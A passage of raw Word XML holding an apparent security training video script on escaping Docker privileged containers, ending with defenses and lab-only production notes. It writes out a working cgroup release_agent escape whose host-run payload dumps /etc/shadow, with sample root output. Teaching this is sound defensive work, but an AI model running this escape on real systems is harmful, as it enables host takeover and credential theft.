        <w:t xml:space="preserve"># echo "$host_path/cmd" &gt; /tmp/cgrp/release_agent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">I’m mounting the cgroup filesystem and creating a custom cgroup. The release_agent feature allows specifying a program that runs on the host when the last process in a cgroup exits. This program runs on the host, not in the container.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Create the payload — this will execute ON THE HOST</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat &gt; /cmd &lt;&lt; 'EOF'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /output</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /output</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /output</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># chmod +x /cmd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Trigger the release agent by creating and destroying a process in the cgroup</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># echo $$ &gt; /tmp/cgrp/exploit/cgroup.procs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># The shell exits the cgroup, triggering the release agent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Read the output — executed on the host!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat /output</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$6$rounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=656000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$salt$hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...:19400:0:99999:7:::</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">actual-host-name</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">groups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">The release agent ran on the host as root and dumped the shadow file and host information. This technique is well-documented and works on any Docker installation where privileged containers are allowed. It was used in real-world attacks and CTF challenges.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="impact-summary-ppt-slide"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[6:45–7:15] — Impact Summary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What We Just Demonstrated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From a single</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. ✅ Mounted and read the entire host filesystem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. ✅ Harvested all user password hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. ✅ Extracted SSH keys and cloud credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. ✅ Established three persistence mechanisms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. ✅ Accessed all other containers on the host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6. ✅ Extracted production database credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">7. ✅ Demonstrated an alternative escape via cgroup release agent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Total time from initial access to full host compromise:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">~3 minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">In under three minutes, from a single privileged container, we achieved full host compromise — credentials, persistence, lateral movement to other containers, and database access. No exploits. No zero-days. Just the access that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">explicitly grants. This is why security teams must scan for and prevent privileged containers in production.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="key-takeaways-and-bridge-ppt-slide"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[7:15–8:00] — Key Takeaways and Bridge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Defenses Against Privileged Compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2970"/>
        <w:gridCol w:w="4950"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ban</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--privileged</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">in production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use admission controllers (OPA, Kyverno)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Runtime detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Monitor mount syscalls, cgroup changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Audit container configs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Script regular</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">docker inspect</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Minimize capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--cap-add</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">for specific needs only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Read-only root filesystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--read-only</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use non-root users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">flag or USER directive in Dockerfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Defense starts with policy — ban the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flag in production using admission controllers. Use runtime detection to monitor for mount system calls and cgroup modifications that indicate escape attempts. Audit regularly with the detection script we showed earlier. And most importantly — never grant more access than needed. In the next lesson, we’ll explore privilege escalation from less-than-privileged starting points — when an attacker doesn’t start with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">but escalates through individual capabilities and misconfigurations.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SLIDE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Next: Privilege Escalation &amp; Container Escape Techniques →</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="30" w:name="script-end"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SCRIPT END</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="29" w:name="post-production-notes"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post-Production Notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICAL:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All demonstrations must be performed in an isolated lab environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add a persistent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">⚠️ LAB ENVIRONMENT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">banner overlay during all terminal sequences</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Redact any real-looking credentials in post-production — use clearly fake values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The cgroup release agent technique should have a diagram overlay explaining the flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For credential harvesting, use a split screen: left for the command, right for explanation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The impact summary slide should use a stopwatch animation showing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3 minutes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add a brief ethical hacking disclaimer at the video start and end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pre-test ALL commands on Ubuntu 22.04 with Docker 24.x+</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2026-07-05T20:27:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-05T20:27:11Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>